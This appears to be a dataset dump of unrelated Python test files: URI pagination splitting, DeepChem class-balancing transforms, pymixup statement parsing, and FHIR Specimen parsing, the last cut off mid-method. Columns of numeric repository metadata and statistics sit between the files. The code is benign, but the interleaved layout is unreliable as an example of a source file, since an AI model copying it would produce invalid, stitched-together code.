    ('/foo/bar/2/', ('/foo/bar', 2), True),
    ('/foo/bar.ext', ('/foo/bar.ext', 1), True),
    ('/foo/bar.ext/2', ('/foo/bar.ext', 2), True),
    ('/', ('/', 1), False),
    ('/2.html', ('/', 2), False),
    ('/foo/bar.html', ('/foo/bar.html', 1), False),
    ('/foo/bar/2.html', ('/foo/bar.html', 2), False),
    ('/foo/bar.ext', ('/foo/bar.ext', 1), False),
    ('/foo/bar/2.ext', ('/foo/bar.ext', 2), False)
])
def test_split_sub_uri(uri, expected, pretty_urls):
    """split_sub_uri should peel the pagination suffix off the URI."""
    config = {
        'site/root': '/',
        'site/pretty_urls': pretty_urls,
        '__cache/pagination_suffix_re': '/(?P<num>\\d+)$'}
    app = mock.MagicMock()
    app.config = config
    # `expected` is already the (base_uri, page_num) pair we want back.
    assert split_sub_uri(app, uri) == expected
@pytest.mark.parametrize('uri, expected, pretty_urls', [
    ('/', ('/', 1), True),
    ('/2/', ('/', 2), True),
    ('/foo/bar', ('/foo/bar/', 1), True),
    ('/foo/bar/', ('/foo/bar/', 1), True),
    ('/foo/bar/2', ('/foo/bar/', 2), True),
    ('/foo/bar/2/', ('/foo/bar/', 2), True),
    ('/foo/bar.ext/', ('/foo/bar.ext/', 1), True),
    ('/foo/bar.ext/2/', ('/foo/bar.ext/', 2), True),
])
def test_split_sub_uri_trailing_slash(uri, expected, pretty_urls):
    """With site/trailing_slash on, the base URI keeps its trailing slash."""
    config = {
        'site/root': '/',
        'site/pretty_urls': pretty_urls,
        'site/trailing_slash': True,
        '__cache/pagination_suffix_re': '/(?P<num>\\d+)$'}
    app = mock.MagicMock()
    app.config = config
    assert split_sub_uri(app, uri) == expected
@pytest.mark.parametrize('uri, expected, pretty_urls', [
    ('/', ('/', 1), True),
    ('/2', ('/', 2), True),
    ('/foo/bar', ('/foo/bar', 1), True),
    ('/foo/bar/', ('/foo/bar', 1), True),
    ('/foo/bar/2', ('/foo/bar', 2), True),
    ('/foo/bar/2/', ('/foo/bar', 2), True),
    ('/foo/bar.ext', ('/foo/bar.ext', 1), True),
    ('/foo/bar.ext/2', ('/foo/bar.ext', 2), True),
    ('/', ('/', 1), False),
    ('/2.html', ('/', 2), False),
    ('/foo/bar.html', ('/foo/bar.html', 1), False),
    ('/foo/bar/2.html', ('/foo/bar.html', 2), False),
    ('/foo/bar.ext', ('/foo/bar.ext', 1), False),
    ('/foo/bar/2.ext', ('/foo/bar.ext', 2), False)
])
def test_split_sub_uri_with_root(uri, expected, pretty_urls):
    """Splitting must also work when the site root is not '/'."""
    root = '/whatever'
    config = {
        'site/root': root + '/',
        'site/pretty_urls': pretty_urls,
        '__cache/pagination_suffix_re': '/(?P<num>\\d+)$'}
    app = mock.MagicMock()
    app.config = config
    # The returned base URI is the root-prefixed expectation.
    assert split_sub_uri(app, root + uri) == (root + expected[0], expected[1])
| 36.532468
| 66
| 0.50871
| 380
| 2,813
| 3.644737
| 0.113158
| 0.216607
| 0.116968
| 0.07148
| 0.886643
| 0.873646
| 0.873646
| 0.873646
| 0.873646
| 0.873646
| 0
| 0.02587
| 0.202986
| 2,813
| 76
| 67
| 37.013158
| 0.591882
| 0
| 0
| 0.73913
| 0
| 0
| 0.328947
| 0.029872
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c110aba556247840a81e0d2194a42594ea74bc5
| 6,824
|
py
|
Python
|
deepchem/trans/tests/test_balancing.py
|
micimize/deepchem
|
651df9f9d8e6f1b33d3af8f0be251e9e8095fe88
|
[
"MIT"
] | 1
|
2020-08-19T17:25:27.000Z
|
2020-08-19T17:25:27.000Z
|
deepchem/trans/tests/test_balancing.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2020-09-22T18:42:21.000Z
|
2020-09-22T18:42:21.000Z
|
deepchem/trans/tests/test_balancing.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2022-03-11T00:10:23.000Z
|
2022-03-11T00:10:23.000Z
|
import os
import numpy as np
import deepchem as dc
import itertools
import tempfile
def test_binary_1d():
  """Balancing transformer on a single-task dataset with no explicit task axis."""
  np.random.seed(123)
  n_samples, n_features, n_classes = 20, 3, 2
  ids = np.arange(n_samples)
  X = np.random.rand(n_samples, n_features)
  y = np.random.randint(n_classes, size=(n_samples,))
  w = np.ones((n_samples,))
  dataset = dc.data.NumpyDataset(X, y, w)
  transformer = dc.trans.BalancingTransformer(dataset=dataset)
  dataset = transformer.transform(dataset)
  X_t, y_t, w_t, ids_t = dataset.X, dataset.y, dataset.w, dataset.ids
  # Ids must come through untouched.
  for orig_id, new_id in zip(ids, ids_t):
    assert orig_id == new_id
  # A BalancingTransformer only rewrites w; X and y are left alone.
  np.testing.assert_allclose(X, X_t)
  np.testing.assert_allclose(y, y_t)
  # Zero-weight entries must stay at zero weight.
  np.testing.assert_allclose(w_t[w == 0], np.zeros_like(w_t[w == 0]))
  # After balancing, classes 0 and 1 carry equal total weight.
  assert np.isclose(np.sum(w_t[y_t == 0]), np.sum(w_t[y_t == 1]))
def test_binary_singletask():
  """Balancing transformer on a (n_samples, 1) single-task dataset."""
  np.random.seed(123)
  n_samples, n_features, n_tasks, n_classes = 20, 3, 1, 2
  ids = np.arange(n_samples)
  X = np.random.rand(n_samples, n_features)
  y = np.random.randint(n_classes, size=(n_samples, n_tasks))
  w = np.ones((n_samples, n_tasks))
  dataset = dc.data.NumpyDataset(X, y, w)
  transformer = dc.trans.BalancingTransformer(dataset=dataset)
  dataset = transformer.transform(dataset)
  X_t, y_t, w_t, ids_t = dataset.X, dataset.y, dataset.w, dataset.ids
  # Ids must come through untouched.
  for orig_id, new_id in zip(ids, ids_t):
    assert orig_id == new_id
  # A BalancingTransformer only rewrites w; X and y are left alone.
  np.testing.assert_allclose(X, X_t)
  np.testing.assert_allclose(y, y_t)
  for ind, _ in enumerate(dataset.get_task_names()):
    y_task, w_task, w_orig = y_t[:, ind], w_t[:, ind], w[:, ind]
    # Zero-weight entries must stay at zero weight.
    np.testing.assert_allclose(w_task[w_orig == 0],
                               np.zeros_like(w_task[w_orig == 0]))
    # Classes 0 and 1 carry equal total weight within each task.
    assert np.isclose(np.sum(w_task[y_task == 0]), np.sum(w_task[y_task == 1]))
def test_binary_multitask():
  """Balancing transformer on a 5-task binary dataset."""
  n_samples, n_features, n_tasks, n_classes = 10, 3, 5, 2
  ids = np.arange(n_samples)
  X = np.random.rand(n_samples, n_features)
  y = np.random.randint(n_classes, size=(n_samples, n_tasks))
  w = np.ones((n_samples, n_tasks))
  multitask_dataset = dc.data.NumpyDataset(X, y, w)
  transformer = dc.trans.BalancingTransformer(dataset=multitask_dataset)
  multitask_dataset = transformer.transform(multitask_dataset)
  X_t = multitask_dataset.X
  y_t = multitask_dataset.y
  w_t = multitask_dataset.w
  ids_t = multitask_dataset.ids
  # Ids must come through untouched.
  for orig_id, new_id in zip(ids, ids_t):
    assert orig_id == new_id
  # A BalancingTransformer only rewrites w; X and y are left alone.
  np.testing.assert_allclose(X, X_t)
  np.testing.assert_allclose(y, y_t)
  for ind, _ in enumerate(multitask_dataset.get_task_names()):
    y_task, w_task, w_orig = y_t[:, ind], w_t[:, ind], w[:, ind]
    # Zero-weight entries must stay at zero weight.
    np.testing.assert_allclose(w_task[w_orig == 0],
                               np.zeros_like(w_task[w_orig == 0]))
    # Classes 0 and 1 carry equal total weight within each task.
    assert np.isclose(np.sum(w_task[y_task == 0]), np.sum(w_task[y_task == 1]))
def test_multiclass_singletask():
  """Balancing transformer on a 5-class single-task dataset."""
  n_samples, n_features, n_tasks, n_classes = 50, 3, 1, 5
  ids = np.arange(n_samples)
  X = np.random.rand(n_samples, n_features)
  y = np.random.randint(n_classes, size=(n_samples, n_tasks))
  w = np.ones((n_samples, n_tasks))
  dataset = dc.data.NumpyDataset(X, y, w)
  transformer = dc.trans.BalancingTransformer(dataset=dataset)
  dataset = transformer.transform(dataset)
  X_t, y_t, w_t, ids_t = dataset.X, dataset.y, dataset.w, dataset.ids
  # Ids must come through untouched.
  for orig_id, new_id in zip(ids, ids_t):
    assert orig_id == new_id
  # A BalancingTransformer only rewrites w; X and y are left alone.
  np.testing.assert_allclose(X, X_t)
  np.testing.assert_allclose(y, y_t)
  for ind, _ in enumerate(dataset.get_task_names()):
    y_task, w_task = y_t[:, ind], w_t[:, ind]
    # Every pair of distinct classes must carry equal total weight.
    for i, j in itertools.product(range(n_classes), range(n_classes)):
      if i == j:
        continue
      assert np.isclose(
          np.sum(w_task[y_task == i]), np.sum(w_task[y_task == j]))
def test_transform_to_directory():
  """Balanced output can be round-tripped through a DiskDataset directory."""
  np.random.seed(123)
  n_samples, n_features, n_classes = 20, 3, 2
  ids = np.arange(n_samples)
  X = np.random.rand(n_samples, n_features)
  y = np.random.randint(n_classes, size=(n_samples,))
  w = np.ones((n_samples,))
  dataset = dc.data.NumpyDataset(X, y, w)
  transformer = dc.trans.BalancingTransformer(dataset=dataset)
  with tempfile.TemporaryDirectory() as tmpdirname:
    dataset = transformer.transform(dataset, out_dir=tmpdirname)
    # Re-open what was written to disk and check it from there.
    balanced = dc.data.DiskDataset(tmpdirname)
    X_t, y_t, w_t, ids_t = balanced.X, balanced.y, balanced.w, balanced.ids
    # Ids must come through untouched.
    for orig_id, new_id in zip(ids, ids_t):
      assert orig_id == new_id
    # A BalancingTransformer only rewrites w; X and y are left alone.
    np.testing.assert_allclose(X, X_t)
    np.testing.assert_allclose(y, y_t)
    # Zero-weight entries must stay at zero weight.
    np.testing.assert_allclose(w_t[w == 0], np.zeros_like(w_t[w == 0]))
    # Classes 0 and 1 carry equal total weight after balancing.
    assert np.isclose(np.sum(w_t[y_t == 0]), np.sum(w_t[y_t == 1]))
| 38.994286
| 90
| 0.699443
| 1,144
| 6,824
| 3.949301
| 0.096154
| 0.044267
| 0.046481
| 0.07127
| 0.860779
| 0.84772
| 0.8444
| 0.83444
| 0.822931
| 0.812528
| 0
| 0.010718
| 0.193288
| 6,824
| 174
| 91
| 39.218391
| 0.809991
| 0.216295
| 0
| 0.763359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183206
| 1
| 0.038168
| false
| 0
| 0.038168
| 0
| 0.076336
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c2ace55c3094d237b2ee33d730a279091ae7a83
| 10,872
|
py
|
Python
|
tests/obfuscatetests/test_ob_get_source_statements.py
|
rdevost/pymixup
|
9004fbdc7939033014b0eefa669056014647a0c8
|
[
"MIT"
] | 5
|
2017-01-02T15:12:31.000Z
|
2021-09-03T15:51:39.000Z
|
tests/obfuscatetests/test_ob_get_source_statements.py
|
rdevost/pymixup
|
9004fbdc7939033014b0eefa669056014647a0c8
|
[
"MIT"
] | null | null | null |
tests/obfuscatetests/test_ob_get_source_statements.py
|
rdevost/pymixup
|
9004fbdc7939033014b0eefa669056014647a0c8
|
[
"MIT"
] | 1
|
2021-09-03T15:51:41.000Z
|
2021-09-03T15:51:41.000Z
|
import pytest
from os.path import join
import io
from logic.obfuscatefile import source_statement_gen
def test_get_source_statements(tmpdir):
    """Exercise source_statement_gen over a synthetic source file.

    Writes a small python file covering line continuations, doc strings,
    comments, platform blocks, kivy directives, parenthesized
    continuations and triple-quoted strings, then checks the statement
    stream for the iOS, android and default platforms.

    Fix: use the builtin next() instead of the generator's .next()
    method — .next() is Python-2-only (renamed __next__ in Python 3),
    while next() works on both.
    """
    #
    # Create a short source file
    #
    dir_name = str(tmpdir.mkdir('source'))
    source_file = 'app.py'
    with io.open(join(dir_name, source_file), 'w') as source:
        # Test a python line
        source.write(u'from x import y\n')
        # Test a lines which continues with a \ --they should be merged
        source.write(u'from z import a, \\ \n')
        source.write(u'b, \\ \n')
        source.write(u'c \n')
        # Test a single-line doc string --it should be skipped
        source.write(u'"""Single line-doc string with double-quotes."""\n')
        source.write(u"'''Single line-doc string with single-quotes.'''\n")
        # Test a multi-line doc string --they should be skipped
        source.write(u'""" Multi-line \n')
        source.write(u'doc string \n')
        source.write(u'with double-quotes.\n')
        source.write(u'"""\n')
        source.write(u"''' Multi-line \n")
        source.write(u"doc string \n")
        source.write(u"with single-quotes.\n")
        source.write(u"'''\n")
        # Test comment lines --it should be skipped
        source.write(u' # This is a comment\n')
        # Test code lines with comments,
        # these will not be stripped by statement but rather by transformation
        source.write(u' some_func(x) # Comment\n')
        # Test skip platform block
        source.write(u' # {+android}\n')
        source.write(u' android_func(x)\n')
        source.write(u' # {-android}\n')
        # Keep kivy directives
        source.write(u'#: scenario xyz\n')
        # Treat line continuation with parens --they should be merged
        source.write(u' row = get(\n')
        source.write(u' dist_id if dist_id\n')
        source.write(u' else var.dist.id)\n')
        # Treat lines with parens in quotes --parens should be ignored
        source.write(u'this "( should be a complete line("\n')
        source.write(u"...as ')' should this')'\n")
        # Treat multiline triple-quoted variable strings as strings
        source.write(u'x = """ Multi-line \n')
        source.write(u'string \n')
        source.write(u'with double-quotes.\n')
        source.write(u'"""\n')  # End with stand-alone quotes
        source.write(u"x =''' Multi-line \n")
        source.write(u"string \n")
        source.write(u"with single-quotes.'''\n")  # End with quotes at end
        # Treat multiline triple-quoted strings as strings
        source.write(u'"""\n')
        source.write(u'Multi-line \n')
        source.write(u'string \n')
        source.write(u'with double-quotes.\n')
        source.write(u'"""\n')
        source.write(u"'''\n")
        source.write(u"Multi-line \n")
        source.write(u"string \n")
        source.write(u"with single-quotes.'''\n")
    #
    # Read source file for iOS platform (should skip android lines)
    #
    get_statement_gen = source_statement_gen(source_file, dir_name,
                                             platform='iOS')
    assert next(get_statement_gen) == (u'from x import y', False)
    assert next(get_statement_gen) == (u'from z import a, b, c', False)
    assert next(get_statement_gen) == \
        (u' some_func(x) # Comment', False)
    assert next(get_statement_gen) == \
        (u'#: scenario xyz', False)
    assert next(get_statement_gen) == \
        (u' row = get( dist_id if dist_id else var.dist.id)', False)
    assert next(get_statement_gen) == \
        (u'this "( should be a complete line("', False)
    assert next(get_statement_gen) == \
        (u"...as ')' should this')'", False)
    # Quote variable string
    assert next(get_statement_gen) == \
        (u'x = """ Multi-line', False)
    assert next(get_statement_gen) == \
        (u'string', False)
    assert next(get_statement_gen) == \
        (u'with double-quotes.', False)
    assert next(get_statement_gen) == \
        (u'"""', False)
    assert next(get_statement_gen) == \
        (u"x =''' Multi-line", False)
    assert next(get_statement_gen) == \
        (u"string", False)
    assert next(get_statement_gen) == \
        (u"with single-quotes.'''", False)
    # Quote string
    assert next(get_statement_gen) == \
        (u'"""', True)
    assert next(get_statement_gen) == \
        (u'Multi-line', True)
    assert next(get_statement_gen) == \
        (u'string', True)
    assert next(get_statement_gen) == \
        (u'with double-quotes.', True)
    assert next(get_statement_gen) == \
        (u'"""', True)
    assert next(get_statement_gen) == \
        (u"'''", True)
    assert next(get_statement_gen) == \
        (u"Multi-line", True)
    assert next(get_statement_gen) == \
        (u"string", True)
    assert next(get_statement_gen) == \
        (u"with single-quotes.'''", True)
    with pytest.raises(StopIteration):
        assert next(get_statement_gen)
    #
    # Read source file for android platform (should include android lines)
    #
    get_statement_gen = source_statement_gen(
        source_file, dir_name, platform='android')
    assert next(get_statement_gen) == (u'from x import y', False)
    assert next(get_statement_gen) == (u'from z import a, b, c', False)
    assert next(get_statement_gen) == \
        (u' some_func(x) # Comment', False)
    assert next(get_statement_gen) == \
        (u' android_func(x)', False)
    assert next(get_statement_gen) == \
        (u'#: scenario xyz', False)
    assert next(get_statement_gen) == \
        (u' row = get( dist_id if dist_id else var.dist.id)', False)
    assert next(get_statement_gen) == \
        (u'this "( should be a complete line("', False)
    assert next(get_statement_gen) == \
        (u"...as ')' should this')'", False)
    # Quote variable string
    assert next(get_statement_gen) == \
        (u'x = """ Multi-line', False)
    assert next(get_statement_gen) == \
        (u'string', False)
    assert next(get_statement_gen) == \
        (u'with double-quotes.', False)
    assert next(get_statement_gen) == \
        (u'"""', False)
    assert next(get_statement_gen) == \
        (u"x =''' Multi-line", False)
    assert next(get_statement_gen) == \
        (u"string", False)
    assert next(get_statement_gen) == \
        (u"with single-quotes.'''", False)
    # Quote string
    assert next(get_statement_gen) == \
        (u'"""', True)
    assert next(get_statement_gen) == \
        (u'Multi-line', True)
    assert next(get_statement_gen) == \
        (u'string', True)
    assert next(get_statement_gen) == \
        (u'with double-quotes.', True)
    assert next(get_statement_gen) == \
        (u'"""', True)
    assert next(get_statement_gen) == \
        (u"'''", True)
    assert next(get_statement_gen) == \
        (u"Multi-line", True)
    assert next(get_statement_gen) == \
        (u"string", True)
    assert next(get_statement_gen) == \
        (u"with single-quotes.'''", True)
    with pytest.raises(StopIteration):
        next(get_statement_gen)
    #
    # Read source file for default platform (should include android lines)
    #
    get_statement_gen = source_statement_gen(
        source_file, dir_name)
    assert next(get_statement_gen) == (u'from x import y', False)
    assert next(get_statement_gen) == (u'from z import a, b, c', False)
    assert next(get_statement_gen) == \
        (u' some_func(x) # Comment', False)
    assert next(get_statement_gen) == \
        (u' android_func(x)', False)
    assert next(get_statement_gen) == \
        (u'#: scenario xyz', False)
    assert next(get_statement_gen) == \
        (u' row = get( dist_id if dist_id else var.dist.id)', False)
    assert next(get_statement_gen) == \
        (u'this "( should be a complete line("', False)
    assert next(get_statement_gen) == \
        (u"...as ')' should this')'", False)
    # Quote variable string
    assert next(get_statement_gen) == \
        (u'x = """ Multi-line', False)
    assert next(get_statement_gen) == \
        (u'string', False)
    assert next(get_statement_gen) == \
        (u'with double-quotes.', False)
    assert next(get_statement_gen) == \
        (u'"""', False)
    assert next(get_statement_gen) == \
        (u"x =''' Multi-line", False)
    assert next(get_statement_gen) == \
        (u"string", False)
    assert next(get_statement_gen) == \
        (u"with single-quotes.'''", False)
    # Quote string
    assert next(get_statement_gen) == \
        (u'"""', True)
    assert next(get_statement_gen) == \
        (u'Multi-line', True)
    assert next(get_statement_gen) == \
        (u'string', True)
    assert next(get_statement_gen) == \
        (u'with double-quotes.', True)
    assert next(get_statement_gen) == \
        (u'"""', True)
    assert next(get_statement_gen) == \
        (u"'''", True)
    assert next(get_statement_gen) == \
        (u"Multi-line", True)
    assert next(get_statement_gen) == \
        (u"string", True)
    assert next(get_statement_gen) == \
        (u"with single-quotes.'''", True)
    with pytest.raises(StopIteration):
        next(get_statement_gen)
def test_get_source_statements_multiple_parens(tmpdir):
    """Statements with adjacent quotes and quoted parens stay single lines.

    Fix: use the builtin next() instead of the generator's .next()
    method — .next() is Python-2-only (renamed __next__ in Python 3),
    while next() works on both.
    """
    dir_name = str(tmpdir.mkdir('source'))
    source_file = 'app.py'
    # Test with adjacent single quotes
    with io.open(join(dir_name, source_file), 'w') as source:
        # Test a python line
        source.write(u"class ValidationError(Exception):\n")
        source.write(u"def __init__(self, message='', title=_('Error')):\n")
        source.write(u"self.message = message\n")
        source.write(u"self.title = title\n")
    get_statement_gen = source_statement_gen(
        source_file, dir_name)
    assert next(get_statement_gen) == (
        u"class ValidationError(Exception):", False)
    assert next(get_statement_gen) == (
        u"def __init__(self, message='', title=_('Error')):", False)
    assert next(get_statement_gen) == (u"self.message = message", False)
    assert next(get_statement_gen) == (u"self.title = title", False)
    # Test with quoted parens
    with io.open(join(dir_name, source_file), 'w') as source:
        # Test a python line
        source.write(u"self.lpar = Literal('(').suppress()\n")
        source.write(u"self.rpar = Literal(')').suppress()\n")
    get_statement_gen = source_statement_gen(source_file, dir_name)
    assert next(get_statement_gen) == (
        u"self.lpar = Literal('(').suppress()", False)
    assert next(get_statement_gen) == (
        u"self.rpar = Literal(')').suppress()", False)
    with pytest.raises(StopIteration):
        next(get_statement_gen)
| 37.75
| 78
| 0.588944
| 1,410
| 10,872
| 4.37305
| 0.090071
| 0.179046
| 0.209212
| 0.249595
| 0.847551
| 0.79614
| 0.786409
| 0.747973
| 0.703211
| 0.701103
| 0
| 0
| 0.256163
| 10,872
| 287
| 79
| 37.881533
| 0.762458
| 0.099982
| 0
| 0.780269
| 0
| 0
| 0.235765
| 0.015595
| 0
| 0
| 0
| 0
| 0.349776
| 1
| 0.008969
| false
| 0
| 0.053812
| 0
| 0.06278
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1c47745f1c0e2c39646a97885253608082c44006
| 46
|
py
|
Python
|
__init__.py
|
lucaskjaero/WiktionaryParser
|
c60a7cb7e50ca929e02c8e6e258c23f4d4114c21
|
[
"MIT"
] | 1
|
2021-08-24T17:51:41.000Z
|
2021-08-24T17:51:41.000Z
|
__init__.py
|
lucaskjaero/WiktionaryParser
|
c60a7cb7e50ca929e02c8e6e258c23f4d4114c21
|
[
"MIT"
] | null | null | null |
__init__.py
|
lucaskjaero/WiktionaryParser
|
c60a7cb7e50ca929e02c8e6e258c23f4d4114c21
|
[
"MIT"
] | 1
|
2020-12-14T16:22:31.000Z
|
2020-12-14T16:22:31.000Z
|
from .wiktionaryparser import WiktionaryParser
| 46
| 46
| 0.913043
| 4
| 46
| 10.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
98d48231698048016fa5002738e0348323b850f0
| 11,362
|
py
|
Python
|
fhirclient/models/specimen_tests.py
|
zzhou41/client-py
|
cbfa8d7c7f1bad233b237b7c5582fc0577b21f70
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/specimen_tests.py
|
zzhou41/client-py
|
cbfa8d7c7f1bad233b237b7c5582fc0577b21f70
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/specimen_tests.py
|
zzhou41/client-py
|
cbfa8d7c7f1bad233b237b7c5582fc0577b21f70
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b on 2019-07-29.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import specimen
from .fhirdate import FHIRDate
class SpecimenTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Specimen", js["resourceType"])
return specimen.Specimen(js)
def testSpecimen1(self):
inst = self.instantiate_from("specimen-example-isolate.json")
self.assertIsNotNone(inst, "Must have instantiated a Specimen instance")
self.implSpecimen1(inst)
js = inst.as_json()
self.assertEqual("Specimen", js["resourceType"])
inst2 = specimen.Specimen(js)
self.implSpecimen1(inst2)
    def implSpecimen1(self, inst):
        """Field-level assertions for the specimen-example-isolate.json fixture."""
        self.assertEqual(inst.accessionIdentifier.system, "http://lab.acme.org/specimens/2011")
        self.assertEqual(inst.accessionIdentifier.value, "X352356-ISO1")
        # FHIRDate wraps the parsed date; as_json() must echo the original string.
        self.assertEqual(inst.collection.collectedDateTime.date, FHIRDate("2015-08-16T07:03:00Z").date)
        self.assertEqual(inst.collection.collectedDateTime.as_json(), "2015-08-16T07:03:00Z")
        self.assertEqual(inst.collection.method.coding[0].code, "BAP")
        self.assertEqual(inst.collection.method.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0488")
        self.assertEqual(inst.contained[0].id, "stool")
        self.assertEqual(inst.id, "isolate")
        self.assertEqual(inst.meta.tag[0].code, "HTEST")
        self.assertEqual(inst.meta.tag[0].display, "test health data")
        self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
        self.assertEqual(inst.note[0].text, "Patient dropped off specimen")
        self.assertEqual(inst.receivedTime.date, FHIRDate("2015-08-18T07:03:00Z").date)
        self.assertEqual(inst.receivedTime.as_json(), "2015-08-18T07:03:00Z")
        self.assertEqual(inst.status, "available")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "429951000124103")
        self.assertEqual(inst.type.coding[0].display, "Bacterial isolate specimen")
        self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
def testSpecimen2(self):
    """Round-trip specimen-example-pooled-serum.json: parse, check, serialize, re-parse, check."""
    instance = self.instantiate_from("specimen-example-pooled-serum.json")
    self.assertIsNotNone(instance, "Must have instantiated a Specimen instance")
    self.implSpecimen2(instance)
    payload = instance.as_json()
    self.assertEqual("Specimen", payload["resourceType"])
    rehydrated = specimen.Specimen(payload)
    self.implSpecimen2(rehydrated)

def implSpecimen2(self, inst):
    """Assert the field values expected for the pooled-serum example."""
    accession = inst.accessionIdentifier
    self.assertEqual(accession.system, "https://vetmed.iastate.edu/vdl")
    self.assertEqual(accession.value, "20171120-1234")
    collected = inst.collection.collectedDateTime
    self.assertEqual(collected.date, FHIRDate("2017-11-14").date)
    self.assertEqual(collected.as_json(), "2017-11-14")
    container_type = inst.container[0].type
    self.assertEqual(container_type.coding[0].code, "RTT")
    self.assertEqual(container_type.coding[0].display, "Red Top Tube")
    self.assertEqual(container_type.coding[0].system, "https://vetmed.iastate.edu/vdl")
    self.assertEqual(container_type.text, "Red Top Blood Collection Tube")
    self.assertEqual(inst.id, "pooled-serum")
    tag = inst.meta.tag[0]
    self.assertEqual(tag.code, "HTEST")
    self.assertEqual(tag.display, "test health data")
    self.assertEqual(tag.system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
    self.assertEqual(inst.note[0].text, "Pooled serum sample from 30 individuals")
    self.assertEqual(inst.text.status, "generated")
    type_coding = inst.type.coding[0]
    self.assertEqual(type_coding.code, "Serum sample, pooled")
    self.assertEqual(type_coding.display, "Serum sample, pooled")
    self.assertEqual(type_coding.system, "https://vetmed.iastate.edu/vdl")
    self.assertEqual(inst.type.text, "Pooled serum sample")
def testSpecimen3(self):
    """Round-trip specimen-example-urine.json: parse, check, serialize, re-parse, check."""
    instance = self.instantiate_from("specimen-example-urine.json")
    self.assertIsNotNone(instance, "Must have instantiated a Specimen instance")
    self.implSpecimen3(instance)
    payload = instance.as_json()
    self.assertEqual("Specimen", payload["resourceType"])
    rehydrated = specimen.Specimen(payload)
    self.implSpecimen3(rehydrated)

def implSpecimen3(self, inst):
    """Assert the field values expected for the urine example."""
    accession = inst.accessionIdentifier
    self.assertEqual(accession.system, "http://lab.acme.org/specimens/2015")
    self.assertEqual(accession.value, "X352356")
    collected = inst.collection.collectedDateTime
    self.assertEqual(collected.date, FHIRDate("2015-08-18T07:03:00Z").date)
    self.assertEqual(collected.as_json(), "2015-08-18T07:03:00Z")
    container = inst.container[0]
    self.assertEqual(container.capacity.unit, "mls")
    self.assertEqual(container.capacity.value, 50)
    self.assertEqual(container.specimenQuantity.unit, "mls")
    self.assertEqual(container.specimenQuantity.value, 10)
    self.assertEqual(container.type.text, "Non-sterile specimen container")
    self.assertEqual(inst.id, "vma-urine")
    tag = inst.meta.tag[0]
    self.assertEqual(tag.code, "HTEST")
    self.assertEqual(tag.display, "test health data")
    self.assertEqual(tag.system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
    processing = inst.processing[0]
    self.assertEqual(processing.description, "Acidify to pH < 3.0 with 6 N HCl.")
    self.assertEqual(processing.procedure.coding[0].code, "ACID")
    self.assertEqual(processing.procedure.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0373")
    self.assertEqual(processing.timeDateTime.date, FHIRDate("2015-08-18T08:10:00Z").date)
    self.assertEqual(processing.timeDateTime.as_json(), "2015-08-18T08:10:00Z")
    self.assertEqual(inst.receivedTime.date, FHIRDate("2015-08-18T07:03:00Z").date)
    self.assertEqual(inst.receivedTime.as_json(), "2015-08-18T07:03:00Z")
    self.assertEqual(inst.status, "available")
    self.assertEqual(inst.text.status, "generated")
    type_coding = inst.type.coding[0]
    self.assertEqual(type_coding.code, "RANDU")
    self.assertEqual(type_coding.display, "Urine, Random")
    self.assertEqual(type_coding.system, "http://terminology.hl7.org/CodeSystem/v2-0487")
def testSpecimen4(self):
    """Round-trip specimen-example-serum.json: parse, check, serialize, re-parse, check."""
    instance = self.instantiate_from("specimen-example-serum.json")
    self.assertIsNotNone(instance, "Must have instantiated a Specimen instance")
    self.implSpecimen4(instance)
    payload = instance.as_json()
    self.assertEqual("Specimen", payload["resourceType"])
    rehydrated = specimen.Specimen(payload)
    self.implSpecimen4(rehydrated)

def implSpecimen4(self, inst):
    """Assert the field values expected for the serum (SST) example."""
